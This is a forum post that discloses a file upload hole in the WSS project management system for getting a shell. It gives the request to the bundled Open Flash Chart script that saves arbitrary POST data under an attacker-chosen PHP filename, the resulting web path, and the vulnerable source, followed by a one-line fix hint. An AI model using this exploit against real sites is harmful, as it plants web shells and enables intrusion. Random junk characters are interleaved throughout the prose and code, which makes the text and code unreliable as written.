找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2124|回复: 0
打印 上一主题 下一主题

WSS项目管理系统Post get shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 12:38:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
POST 数据漏洞文件执行任意后缀文件保存" t$ ]+ ]# s( }$ B) R  P
漏洞文件/chart/php-ofc-library/ofc_upload_image.php* h$ T( @! D; F0 Q$ U# J
- Y% Y: l3 i. E7 a9 d
利用:, m; x5 P9 d2 p) V
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
: m1 q! m" f) w  C6 V7 e6 a3 N
Post任意数据/ L6 }. k& v; h; r' {. H
保存位置http://localhost/chart/tmp-upload-images/hfy.php3 A) [) ~8 O* s: m
3 a1 ^4 E! k& G

  j! h$ J- X5 q5 H最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
/ ?$ L* i% W1 J  w3 g: H% D5 {
4 \# n7 r+ ]( i! @( o, `, D7 J' V% _<?php+ M2 H4 O) c. g2 P: G5 A
( h! Q: ^* B$ b, z
//! @* b9 I5 x: u
// In Open Flash Chart -> save_image debug mode, you. A* r7 ~2 e- v$ ]8 M* _/ D
// will see the 'echo' text in a new window.
7 J" [  P; {% }//
& S7 K7 N% }8 B% n. p3 g$ u. M4 b: b) A
/*! a3 i4 z% q" ]; Q* \

. O/ R6 w$ d. i0 L/ b1 Xprint_r( $_GET );$ Y! L) E; F' r' c( b
print_r( $_POST );
* V6 q  E" z+ G' p% O& uprint_r( $_FILES );
( R* R7 |" c# c; Z
  p* U6 L5 a; Z/ E1 G0 k, `/ \3 qprint_r( $GLOBALS );
# L8 d8 v9 x% G+ s) dprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );3 c# U% W& u6 u1 C& F

1 B/ q! N6 S+ P  m8 ~  R*/2 D5 h3 \8 a) d0 J2 B+ t
// default path for the image to be stored //
' n, m( v7 M; B$default_path = '../tmp-upload-images/';2 u7 r# F5 P1 V1 H

$ p, S& }/ F6 W1 Xif (!file_exists($default_path)) mkdir($default_path, 0777, true);* Q9 Y' A2 Z; n1 @# F2 u( G* s  _

! ?' v) S  v3 ?: |) b2 `6 M// full path to the saved image including filename //- E9 s0 g& n% i/ [7 C
$destination = $default_path . basename( $_GET[ 'name' ] ); , Y) p+ [8 D2 s# c8 H/ R9 h0 Y
  ]4 }+ u) F8 Q
echo 'Saving your image to: '. $destination;2 r  e) U' v4 S! d" |3 T
// print_r( $_POST );
( z$ `& n' b' S1 ^, E# H# p9 B// print_r( $_SERVER );
: M7 r3 @, ~" \8 p// echo $HTTP_RAW_POST_DATA;) r) ^8 ?9 _: g# P+ a

0 Q! Y- H4 m# t- u//5 }! |0 T1 M3 z
// POST data is usually string data, but we are passing a RAW .png
* |3 L) o; |- k  A3 e. [// so PHP is a bit confused and $_POST is empty. But it has saved4 D8 X5 R, V# ]" I& k3 F- p
// the raw bits into $HTTP_RAW_POST_DATA
& M9 T6 x5 s" Y5 r7 d. h//
/ [/ e" n" L3 v( d% X. |4 j
6 D3 `% r# E& p, |+ ]; s  @4 e" m& @$jfh = fopen($destination, 'w') or die("can't open file");+ ^/ e; Q! ^2 B9 m/ X& Q
fwrite($jfh, $HTTP_RAW_POST_DATA);
/ S# Q- [0 _6 [8 yfclose($jfh);  N6 p4 d$ }  L1 w, b) y

4 s7 F% L* l! B$ L6 S, W& [//
6 F' C, ?4 |  S2 J7 {" g) Z" p// LOOK:, K. a5 S8 k: x# M# d
//9 H6 E% T1 R& H4 {/ R( d" c
exit();* |+ @2 ?8 J5 n' m! Q: G: R' v
//
0 B. g6 w. N, Y$ z. N% N1 d- G// PHP5:
6 U% c) b+ c/ L/ n% @3 |//
! H! J, F7 |7 ]: |
/ ^! ?" `- @5 }8 V9 Z9 L6 Y
8 v* Z! F3 L) g; a+ l& e$ t// default path for the image to be stored //
3 j$ o, H! j: d) J$default_path = 'tmp-upload-images/';+ J# P2 k7 A' W

6 f' h% x' ^. K2 [3 O9 zif (!file_exists($default_path)) mkdir($default_path, 0777, true);1 w5 K! m9 c6 e
2 x. M. h) `, g
// full path to the saved image including filename //6 j* [" N' K& a  D6 z
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
6 Y; a! U0 d; L% W, ]. Y2 V; s( o5 X5 S9 @3 M' S% N7 A( ]$ w2 ^
// move the image into the specified directory //
) ~; ?5 t2 m3 k' B: }if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
% s! X& w5 V+ W+ O8 T+ }    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";% r' U. j6 u7 m4 G
} else {/ U6 r' ^; ~2 ]- t
    echo "FILE UPLOAD FAILED";. J6 D0 y9 R9 Y' r$ T; l
}) D* l& D# n* P5 i% J' H
1 \  Q% Y6 X  a& R
+ Y3 @. i2 U* A7 z& H1 d: X' w9 \  K. j
?>
5 ^0 B0 ]+ v8 @) n; C; a- }7 A/ j! ^; d8 j2 k! u  B( [# _

% P$ o8 T/ G; |8 E
& }9 e/ M- |1 D4 ]$ G! W
; O+ k4 _! Q, R% s. Y5 P- h6 A. D) g
1 }9 A, T5 z0 h8 k* R
# Y3 N$ z% e1 v* c' W修复方案: 8 V' Q3 G# s0 N
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 % A# T" u! v4 M/ z" {5 a9 H

2 r* c) |. l( u
+ a8 U5 D: I9 \( ^
; \2 F: D9 @5 Z) y" F9 i* U$ x
/ B3 c/ J4 P* M8 I4 i

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表